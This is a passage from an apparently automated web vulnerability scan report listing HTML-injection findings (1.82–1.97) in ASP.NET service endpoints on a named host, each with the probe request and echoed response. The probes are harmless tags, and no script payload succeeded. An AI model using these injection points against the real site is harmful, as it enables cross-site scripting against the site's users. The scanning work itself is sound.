Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:04 GMT
Content-Length: 22408
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&8bdb6<a>f2e8c6d2662=1/ClipInfoService.asmx" />
...[SNIP]...

1.82. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 8c544<a>375738d4296 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337968c544<a>375738d4296 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:01 GMT
Content-Length: 22396
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337968c544<a>375738d4296/ClipInfoService.asmx" />
...[SNIP]...

1.83. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 38157<a>7e8dbb9295c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&38157<a>7e8dbb9295c=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:10 GMT
Content-Length: 5637
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&38157<a>7e8dbb9295c=1/ErrorInfoService.asmx" />
...[SNIP]...

1.84. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 4d574<a>afe51a628d3 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337964d574<a>afe51a628d3 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:08 GMT
Content-Length: 5625
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337964d574<a>afe51a628d3/ErrorInfoService.asmx" />
...[SNIP]...

1.85. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 15b26<a>94660917f43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&15b26<a>94660917f43=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:45:45 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&15b26<a>94660917f43=1/PlaylistInfoService.asmx" />
...[SNIP]...

1.86. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 97afc<a>1b27d99bc68 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379697afc<a>1b27d99bc68 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:45:43 GMT
Connection: close
Content-Length: 27386

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379697afc<a>1b27d99bc68/PlaylistInfoService.asmx" />
...[SNIP]...

1.87. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 47c22<a>ef7e3604f7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&47c22<a>ef7e3604f7f=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:10 GMT
Content-Length: 8814
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&47c22<a>ef7e3604f7f=1/RSSService.asmx" />
...[SNIP]...

1.88. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 3dd0c<a>b8631e28575 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337963dd0c<a>b8631e28575 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:07 GMT
Content-Length: 8802
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337963dd0c<a>b8631e28575/RSSService.asmx" />
...[SNIP]...

1.89. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b6ec5<a>cd69370a51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&b6ec5<a>cd69370a51b=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:07 GMT
Content-Length: 5534
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&b6ec5<a>cd69370a51b=1/RatingService.asmx" />
...[SNIP]...

1.90. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 4f192<a>a7b9e42493c was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337964f192<a>a7b9e42493c HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:05 GMT
Content-Length: 5522
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337964f192<a>a7b9e42493c/RatingService.asmx" />
...[SNIP]...

1.91. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 32406<a>52ff5e45529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&32406<a>52ff5e45529=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:15 GMT
Content-Length: 1913
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&32406<a>52ff5e45529=1/AdServerService.asmx" />
...[SNIP]...

1.92. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 5468e<a>fbf31252ddf was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337995468e<a>fbf31252ddf HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:13 GMT
Content-Length: 1907
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337995468e<a>fbf31252ddf/AdServerService.asmx" />
...[SNIP]...

1.93. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e81a6<a>eb6d1a11e41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&e81a6<a>eb6d1a11e41=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:54:36 GMT
Connection: close
Content-Length: 20181

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&e81a6<a>eb6d1a11e41=1/ChannelInfoService.asmx" />
...[SNIP]...

1.94. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 847a5<a>b32f67f54e9 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799847a5<a>b32f67f54e9 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:54:35 GMT
Connection: close
Content-Length: 20169

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799847a5<a>b32f67f54e9/ChannelInfoService.asmx" />
...[SNIP]...

1.95. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d1973<a>f81fb9edf10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&d1973<a>f81fb9edf10=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:18 GMT
Content-Length: 22408
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&d1973<a>f81fb9edf10=1/ClipInfoService.asmx" />
...[SNIP]...

1.96. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload d659f<a>818d4ea9fd6 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799d659f<a>818d4ea9fd6 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:15 GMT
Content-Length: 22396
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799d659f<a>818d4ea9fd6/ClipInfoService.asmx" />
...[SNIP]...

1.97. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx

Issue detail

